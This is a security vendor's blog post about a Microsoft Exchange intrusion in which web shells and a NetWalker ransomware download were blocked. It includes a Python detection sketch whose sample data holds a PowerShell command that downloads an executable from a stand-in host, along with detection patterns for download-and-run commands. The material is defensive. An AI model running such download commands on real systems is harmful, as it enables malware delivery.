Company's solid mix of cyber security technologies prevents Microsoft Exchange data breach

The group of Microsoft Exchange vulnerabilities known as ProxyLogon has affected tens of thousands of companies with on-premise, internet-exposed Exchange servers. Even though Microsoft has announced that the majority of vulnerable servers are now patched, experts have warned that merely patching the vulnerabilities is not enough: Threat actors who have already gained access to servers could still be in the network.

F-Secure security consultant Antti Laatikainen predicted historic numbers of breach reports this spring due to the vulnerabilities, which have also caught the attention of ransomware threat actors. With Laatikainen asserting that the ease of access via ProxyLogon means the majority of vulnerable companies have been breached, many companies' best hope becomes that any attacker within their network will be swiftly detected.

Fortunately for one of our European customers, that's exactly what happened.

Foiling an attacker

In March, suspicious activity was detected in the network of a customer organization that uses our endpoint protection and endpoint detection and response (EDR) solutions. Because the activity was related to critical services, the customer wanted to be absolutely sure the incident was addressed properly. Rather than handle the incident internally, the organization opted to use our Elevate to F-Secure service option to escalate it to our security analysts.

Upon investigation, our consultants found that between the 9th and the 18th of March, an attacker had made post-exploitation attempts to write hundreds of malicious files to our customer's Exchange server. Despite the attacker's best efforts, almost all of these files, web shells that attackers use to gain persistent access to a web server, were blocked by our endpoint security solution, F-Secure Elements Endpoint Protection.

A few of the web shells, however, went undetected. The attacker was able to use them to execute additional commands. In one instance, the attacker launched the command prompt and ran the "whoami" command to ensure that web shell control had been established. Our EDR solution, F-Secure Elements Endpoint Detection & Response, recognized the activity as abnormal and flagged it. 

In another instance, the attacker used a PowerShell command to try to download and install the NetWalker family of ransomware. DeepGuard, a proactive protection layer in our endpoint security that monitors for suspicious behavior from file processes, recognized the command action as malicious and blocked it. 

Once our consultants had gained an understanding of how the incident had played out, they were able to evict the attacker and remediate the issue for a painless and happy ending to the story. But without appropriate prevention and detection technologies in place, the incident could have been much worse.

A notorious strain of ransomware

The NetWalker ransomware has been used in attacks on colleges and universities, healthcare institutions, power providers, government agencies, manufacturing firms, and various other verticals. As stated by blockchain analysis company Chainalysis, the ransomware has infected at least 305 victims in 27 countries. 

Those hits have raked in the profits. Chainalysis reported in January that it had traced more than $46 million worth of funds in NetWalker ransoms since the malware's debut in August 2019. One of the victims, the University of California at San Francisco, paid $1.14 million to restore their data. 

NetWalker was also, according to one report, the ransomware family most engaged in leaking data throughout 2020. The group behind the malware exposed data stolen from 113 organizations between January 2020 and January 2021.

Thwarting NetWalker saved our customer from both reputational and financial damages. Not only that, further investigation revealed that had the post-exploitation attempts been successful, the server would also have been co-opted into a cryptocurrency botnet called Prometei. 

Defense in depth works

The situation is a classic example of why organizations need defense in depth. Endpoint security and EDR worked together to protect our customer, and one without the other would not have been sufficient.

Endpoint security proactively blocked hundreds of malicious web shells that were dropped, all before our customer even realized what was happening. And when a few managed to slip through, EDR was able to recognize the ensuing attacker activity as abnormal and register alerts. Endpoint security blocked the installation of ransomware. And EDR's event logging capabilities gave much-needed visibility into the incident for investigators, who used their seasoned expertise to understand what had happened and take appropriate action. 
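The two behaviours the EDR flagged in this incident, a web-server process spawning a command prompt that ran "whoami" and a PowerShell download attempt, are the kind of parent/child anomalies that process-creation telemetry makes visible. The following Python is an added illustration written for this post, not F-Secure product logic or code from the incident. It assumes that Exchange web shells execute inside the IIS worker process (w3wp.exe) and reconstructs the process chain the way the screenshots below show it; the event records are constructed sample telemetry, and the URL is a placeholder.

```python
import re
from dataclasses import dataclass

# Assumption: on an Exchange server the web-facing code runs in the IIS worker
# process, so a shell spawned directly beneath it is abnormal. Not taken from the post.
WEB_SERVER_PROCESSES = {"w3wp.exe"}
SHELL_PROCESSES = {"cmd.exe", "powershell.exe"}
RECON_PROCESSES = {"whoami.exe"}
# Command-line fragments typical of a PowerShell download-and-run step.
DOWNLOAD_PATTERN = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b", re.I)


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample events modelled on the narrative: a web-shell-driven
# "whoami", a blocked download attempt, and a benign scheduled PowerShell job.
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, "w3wp.exe", 'w3wp.exe -ap "ExchangeAppPoolPlaceholder"'),
    ProcessEvent(200, 100, "cmd.exe", 'cmd.exe /c "whoami"'),
    ProcessEvent(201, 200, "whoami.exe", "whoami"),
    ProcessEvent(300, 100, "powershell.exe",
                 "powershell.exe -c Invoke-WebRequest http://placeholder.example/x -OutFile C:\\Windows\\Temp\\x.exe"),
    ProcessEvent(400, 1, "svchost.exe", "svchost.exe -k netsvcs"),
    ProcessEvent(401, 400, "powershell.exe", "powershell.exe -File C:\\scripts\\maintenance.ps1"),
]


def process_chain(events, pid):
    """Walk parent links from pid to the root and return image names root-first."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # seen guards against pid reuse loops
        seen.add(pid)
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return list(reversed(chain))


def detect(events):
    """Return one alert dict per matched rule; a single process may match several."""
    alerts = []
    for e in events:
        chain = process_chain(events, e.pid)
        ancestors = {name.lower() for name in chain[:-1]}
        image = e.image.lower()
        web_rooted = bool(ancestors & WEB_SERVER_PROCESSES)

        # Rule 1: a shell spawned anywhere beneath the web server process.
        if web_rooted and image in SHELL_PROCESSES:
            alerts.append({"pid": e.pid, "rule": "web server spawned shell", "chain": chain})

        # Rule 2: host reconnaissance (e.g. whoami) with web-server ancestry.
        if web_rooted and image in RECON_PROCESSES:
            alerts.append({"pid": e.pid, "rule": "recon under web server", "chain": chain})

        # Rule 3: PowerShell command line that fetches content from the network.
        if image == "powershell.exe" and DOWNLOAD_PATTERN.search(e.cmdline):
            alerts.append({"pid": e.pid, "rule": "powershell download", "chain": chain})
    return alerts


def flagged_pids(events):
    return sorted({a["pid"] for a in detect(events)})


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["pid"], alert["rule"], " -> ".join(alert["chain"]))
```

The benign scheduled job (pid 401) produces no alert because its parent is not a web server and its command line fetches nothing; the same rules would flag the two activities described above while leaving ordinary administration alone.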

Not to be forgotten is the importance of vulnerability management. A vulnerability scanning platform like F-Secure Elements Vulnerability Management will home in on vulnerabilities and prioritize them so you can patch and minimize your attack surface.

Finally, companies need skilled experts to make sense of the alerts and logs and know what to do next to protect the estate. F-Secure partners who don't possess these skills in-house can, like our European customer, have access to our security experts when they need them most. Purchasing security as a service means a whole team of world-class cyber security experts will always have your back. 

F-Secure Elements Endpoint Detection and Response displayed the full process chain of attacker activities

Fig 1: The attacker launched the command prompt and ran the "whoami" command.

Fig 2: F-Secure Elements EDR recognized the events as abnormal.

Fig 3: F-Secure Elements EDR showed the entire process chain, including the details of "whoami" and PowerShell commands.